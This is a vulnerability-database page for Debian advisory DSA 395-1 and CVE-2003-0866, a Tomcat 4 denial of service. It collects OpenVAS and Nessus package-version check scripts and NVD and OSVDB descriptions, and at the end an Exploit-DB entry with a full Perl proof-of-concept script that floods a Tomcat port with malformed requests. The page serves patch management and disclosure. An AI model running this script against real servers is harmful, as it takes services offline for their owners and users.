Search...

Debian Security Advisory DSA 395-1 (tomcat4)

2008-01-17T00:00:00

ID OPENVAS:53376
Type openvas
Reporter Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com
Modified 2017-07-07T00:00:00

Description

The remote host is missing an update to tomcat4 announced via advisory DSA 395-1.

                                        
                                            # OpenVAS Vulnerability Test
# $Id: deb_395_1.nasl 6616 2017-07-07 12:10:49Z cfischer $
# Description: Auto-generated from advisory DSA 395-1
#
# Authors:
# Thomas Reinke &lt;reinke@securityspace.com&gt;
#
# Copyright:
# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largerly excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

include("revisions-lib.inc");
tag_insight = "Aldrin Martoq has discovered a denial of service (DoS) vulnerability in
Apache Tomcat 4.0.x. Sending several non-HTTP requests to Tomcat's HTTP
connector makes Tomcat reject further requests on this port until it is
restarted.

For the current stable distribution (woody) this problem has been fixed
in version 4.0.3-3woody3.

For the unstable distribution (sid) this problem does not exist in the
current version 4.1.24-2.

We recommend that you upgrade your tomcat4 packages and restart the";
tag_summary = "The remote host is missing an update to tomcat4
announced via advisory DSA 395-1.";

tag_solution = "https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20395-1";

if(description)
{
 script_id(53376);
 script_cve_id("CVE-2003-0866");
 script_version("$Revision: 6616 $");
 script_tag(name:"last_modification", value:"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $");
 script_tag(name:"creation_date", value:"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_name("Debian Security Advisory DSA 395-1 (tomcat4)");



 script_category(ACT_GATHER_INFO);

 script_copyright("Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com");
 script_family("Debian Local Security Checks");
 script_dependencies("gather-package-list.nasl");
 script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "insight" , value : tag_insight);
 script_tag(name : "summary" , value : tag_summary);
 script_tag(name:"qod_type", value:"package");
 script_tag(name:"solution_type", value:"VendorFix");
 exit(0);
}

#
# The script code starts here
#

include("pkg-lib-deb.inc");

res = "";
report = "";
if ((res = isdpkgvuln(pkg:"libtomcat4-java", ver:"4.0.3-3woody3", rls:"DEB3.0")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"tomcat4-webapps", ver:"4.0.3-3woody3", rls:"DEB3.0")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"tomcat4", ver:"4.0.3-3woody3", rls:"DEB3.0")) != NULL) {
    report += res;
}

if (report != "") {
    security_message(data:report);
} else if (__pkg_match) {
    exit(99); # Not vulnerable.
}

JSON Vulners Source

Initial Source

{"href": "http://plugins.openvas.org/nasl.php?oid=53376", "history": [{"lastseen": "2017-07-02T21:10:27", "differentElements": ["modified", "sourceData"], "edition": 1, "bulletin": {"href": "http://plugins.openvas.org/nasl.php?oid=53376", "history": [], "naslFamily": "Debian Local Security Checks", "id": "OPENVAS:53376", "title": "Debian Security Advisory DSA 395-1 (tomcat4)", "description": "The remote host is missing an update to tomcat4\nannounced via advisory DSA 395-1.", "published": "2008-01-17T00:00:00", "type": "openvas", "bulletinFamily": "scanner", "hashmap": [{"key": "modified", "hash": "32eb6b7a41d2535376537cb68df94f93"}, {"key": "reporter", "hash": "bd0c646e06156cd71a2e5bbae48ef94c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "pluginID", "hash": "2fe07100dd4ae518997e4578e42bf400"}, {"key": "title", "hash": "79e46fcd8a0a5d92d2a2ca1879d6548e"}, {"key": "sourceData", "hash": "52d010de477b8403330dc4cd2ee0d38c"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}, {"key": "href", "hash": "ecc182904ea98a980c7d062b69a5d14b"}, {"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "3a4489a52aaec17ac51d71c448ea0145"}, {"key": "cvelist", "hash": "1640dcb8030a72386bae031a4ecf6125"}, {"key": "naslFamily", "hash": "74562d71b087df9eabd0c21f99b132cc"}, {"key": "published", "hash": "d50ef4187c812efcd7df8d6f70c1cb0e"}], "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_395_1.nasl 3967 2016-09-06 05:15:51Z teissa $\n# Description: Auto-generated from advisory DSA 395-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Aldrin Martoq has discovered a denial of service (DoS) vulnerability in\nApache Tomcat 4.0.x. Sending several non-HTTP requests to Tomcat's HTTP\nconnector makes Tomcat reject further requests on this port until it is\nrestarted.\n\nFor the current stable distribution (woody) this problem has been fixed\nin version 4.0.3-3woody3.\n\nFor the unstable distribution (sid) this problem does not exist in the\ncurrent version 4.1.24-2.\n\nWe recommend that you upgrade your tomcat4 packages and restart the\";\ntag_summary = \"The remote host is missing an update to tomcat4\nannounced via advisory DSA 395-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20395-1\";\n\nif(description)\n{\n script_id(53376);\n script_cve_id(\"CVE-2003-0866\");\n script_version(\"$Revision: 3967 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-06 07:15:51 +0200 (Tue, 06 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 395-1 (tomcat4)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"HostDetails/OS/cpe:/o:debian:debian_linux\", \"login/SSH/success\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libtomcat4-java\", ver:\"4.0.3-3woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat4-webapps\", ver:\"4.0.3-3woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat4\", ver:\"4.0.3-3woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "pluginID": "53376", "hash": "61b9b909bc605e03f1635a70d189f0cdb7a11a8d6bc0286268488542d56b96bd", "modified": "2016-09-06T00:00:00", "edition": 1, "cvelist": ["CVE-2003-0866"], "lastseen": "2017-07-02T21:10:27", "viewCount": 0, "enchantments": {}, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "objectVersion": "1.3", "references": []}}], "naslFamily": "Debian Local Security Checks", "id": "OPENVAS:53376", "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "description": "The remote host is missing an update to tomcat4\nannounced via advisory DSA 395-1.", "title": "Debian Security Advisory DSA 395-1 (tomcat4)", "bulletinFamily": "scanner", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_395_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 395-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Aldrin Martoq has discovered a denial of service (DoS) vulnerability in\nApache Tomcat 4.0.x. Sending several non-HTTP requests to Tomcat's HTTP\nconnector makes Tomcat reject further requests on this port until it is\nrestarted.\n\nFor the current stable distribution (woody) this problem has been fixed\nin version 4.0.3-3woody3.\n\nFor the unstable distribution (sid) this problem does not exist in the\ncurrent version 4.1.24-2.\n\nWe recommend that you upgrade your tomcat4 packages and restart the\";\ntag_summary = \"The remote host is missing an update to tomcat4\nannounced via advisory DSA 395-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20395-1\";\n\nif(description)\n{\n script_id(53376);\n script_cve_id(\"CVE-2003-0866\");\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 395-1 (tomcat4)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libtomcat4-java\", ver:\"4.0.3-3woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat4-webapps\", ver:\"4.0.3-3woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat4\", ver:\"4.0.3-3woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "pluginID": "53376", "hash": "27df828f70c9c021f81a212f3a1b19a5068c660bfff9f77d4f873a8580ff6a79", "references": [], "edition": 2, "cvelist": ["CVE-2003-0866"], "lastseen": "2017-07-24T12:50:23", "viewCount": 4, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2017-07-24T12:50:23", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0866"]}, {"type": "nessus", "idList": ["TOMCAT_4_1_0.NASL", "DEBIAN_DSA-395.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:23245"]}, {"type": "osvdb", "idList": ["OSVDB:8772"]}], "modified": "2017-07-24T12:50:23", "rev": 2}, "vulnersScore": 6.8}, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "1640dcb8030a72386bae031a4ecf6125"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "3a4489a52aaec17ac51d71c448ea0145"}, {"key": "href", "hash": "ecc182904ea98a980c7d062b69a5d14b"}, {"key": "modified", "hash": "d89cc672a6266551218ef8145d1f22e2"}, {"key": "naslFamily", "hash": "74562d71b087df9eabd0c21f99b132cc"}, {"key": "pluginID", "hash": "2fe07100dd4ae518997e4578e42bf400"}, {"key": "published", "hash": "d50ef4187c812efcd7df8d6f70c1cb0e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "bd0c646e06156cd71a2e5bbae48ef94c"}, {"key": "sourceData", "hash": "9d3287e76f248abf9930a752fd951c25"}, {"key": "title", "hash": "79e46fcd8a0a5d92d2a2ca1879d6548e"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "objectVersion": "1.3", "modified": "2017-07-07T00:00:00"}

{"cve": [{"lastseen": "2020-03-26T10:05:11", "bulletinFamily": "NVD", "description": "The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.", "modified": "2019-03-25T11:29:00", "id": "CVE-2003-0866", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0866", "published": "2003-11-17T05:00:00", "title": "CVE-2003-0866", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2020-06-01T01:12:56", "bulletinFamily": "scanner", "description": "Aldrin Martoq has discovered a denial of service (DoS) vulnerability\nin Apache Tomcat 4.0.x. Sending several non-HTTP requests to Tomcat", "modified": "2020-06-02T00:00:00", "id": "DEBIAN_DSA-395.NASL", "href": "https://www.tenable.com/plugins/nessus/15232", "published": "2004-09-29T00:00:00", "title": "Debian DSA-395-1 : tomcat4 - incorrect input handling", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-395. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15232);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/08/02 13:32:17\");\n\n script_cve_id(\"CVE-2003-0866\");\n script_bugtraq_id(8824);\n script_xref(name:\"DSA\", value:\"395\");\n\n script_name(english:\"Debian DSA-395-1 : tomcat4 - incorrect input handling\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Aldrin Martoq has discovered a denial of service (DoS) vulnerability\nin Apache Tomcat 4.0.x. Sending several non-HTTP requests to Tomcat's\nHTTP connector makes Tomcat reject further requests on this port until\nit is restarted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-395\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tomcat4 packages and restart the tomcat server.\n\nFor the current stable distribution (woody) this problem has been\nfixed in version 4.0.3-3woody3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/10/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libtomcat4-java\", reference:\"4.0.3-3woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"tomcat4\", reference:\"4.0.3-3woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"tomcat4-webapps\", reference:\"4.0.3-3woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-18T03:17:28", "bulletinFamily": "scanner", "description": "According to its self-reported version number, the instance of Apache\nTomcat 4.x listening on the remote host is prior to 4.1.0. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An error exists in the handling of malformed packets\n that can cause the processing thread to become\n unresponsive. A sequence of such requests can cause all\n threads to become unresponsive. (CVE-2003-0866)\n\n - Two example servlets, ", "modified": "2010-11-04T00:00:00", "id": "TOMCAT_4_1_0.NASL", "href": "https://www.tenable.com/plugins/nessus/50475", "published": "2010-11-04T00:00:00", "title": "Apache Tomcat 4.x < 4.1.0 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50475);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/11\");\n\n script_cve_id(\"CVE-2003-0866\", \"CVE-2002-2006\");\n script_bugtraq_id(4575, 5542, 8824);\n\n script_name(english:\"Apache Tomcat 4.x < 4.1.0 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Apache Tomcat version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Apache\nTomcat 4.x listening on the remote host is prior to 4.1.0. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An error exists in the handling of malformed packets\n that can cause the processing thread to become\n unresponsive. A sequence of such requests can cause all\n threads to become unresponsive. (CVE-2003-0866)\n\n - Two example servlets, 'snoop' and a troubleshooting\n servlet, disclose the Apache Tomcat installation path.\n (CVE-2002-2006)\n\n - It has also been reported that this version of Tomcat\n is affected by a cross-site scripting vulnerability.\n The contents of a request URL are not sanitized before\n being returned to the browser should an error occur.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-4.html#Fixed_in_Apache_Tomcat_4.1.0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2002/Apr/322\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apache Tomcat version 4.1.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2003-0866\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/04/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"4.1.0\", min:\"4.0.0\", severity:SECURITY_WARNING, xss:TRUE, granularity_regex:\"^4$\");\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "description": "## Vulnerability Description\nApache Tomcat contains a flaw that may allow a remote attacker to cause a denial of service. The issue occurs when a series of malformed HTTP requests are sent that cause the request processing thread to become unresponsive until the server is restarted by an administrator.\n## Short Description\nApache Tomcat contains a flaw that may allow a remote attacker to cause a denial of service. The issue occurs when a series of malformed HTTP requests are sent that cause the request processing thread to become unresponsive until the server is restarted by an administrator.\n## References:\nVendor URL: http://tomcat.apache.org/\nVendor Specific News/Changelog Entry: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=215506\nVendor Specific News/Changelog Entry: http://tomcat.apache.org/security-4.html\nOther Advisory URL: http://www.debian.org/security/2003/dsa-395\nISS X-Force ID: 13429\n[CVE-2003-0866](https://vulners.com/cve/CVE-2003-0866)\nBugtraq ID: 8824\n", "modified": "2003-10-15T00:00:00", "published": "2003-10-15T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8772", "id": "OSVDB:8772", "type": "osvdb", "title": "Apache Tomcat Catalina org.apache.catalina.connector.http DoS", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T20:35:45", "bulletinFamily": "exploit", "description": "Apache Tomcat 4.0.x Non-HTTP Request Denial Of Service Vulnerability. CVE-2003-0866 . Dos exploit for linux platform", "modified": "2003-10-15T00:00:00", "published": "2003-10-15T00:00:00", "id": "EDB-ID:23245", "href": "https://www.exploit-db.com/exploits/23245/", "type": "exploitdb", "title": "Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/8824/info\r\n\r\nApache Tomcat 4 has been reported prone to a remotely triggered denial-of-service vulnerability when handling undisclosed non-HTTP request types.\r\n\r\nWhen certain non-HTTP request types are handled by the Tomcat HTTP connector, the Tomcat server will reject subsequent requests on the affected port until the service is restarted. \r\n\r\n#!/usr/bin/perl\r\n#\r\n# PoC - DoS Exploit for Apache Tomcat 4\r\n# by Oliver Karow - oliver.karowNOSPAM__AT__gmx.de\r\n# http://www.oliverkarow.de/research/tomcat_crash.txt\r\n#\r\n# Run this script against the Tomcat Admin Port. After execution, the page will not be accessible any more.\r\n# The port is still open and accepting connections, but not responding with content. To verify, connect with your browser\r\n# to the port.\r\n#\r\n\r\nuse IO::Socket;\r\n\r\n$ip=\"192.168.0.16\";\r\n$port=\"8080\";\r\n$counter =0;\r\n\r\n\r\n@attackpattern=(\"'\");\r\nfor ($x=0;$x<=400;$x++){\r\n $headerLine=\"GET /dummy/dontexist.pl? HTTP/1.0\\n\\n\";\r\n @temp=split(/(\\/)/,$headerLine);\r\n foreach (@temp){\r\n $replaceme=$_;\r\n foreach(@attackpattern){\r\n $attack=$_;\r\n $newheaderline=$headerLine;\r\n $newheaderline=~ s/$replaceme/$attack/i;\r\n $remote=IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die \"Connection not possible\\n\";\r\n print $remote $newheaderline;\r\n print \"\\nRequest: \".$counter++.\" \\t\".$newheaderline.\"\\n\";\r\n $remote->close;\r\n }\r\n }\r\n}\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23245/"}]}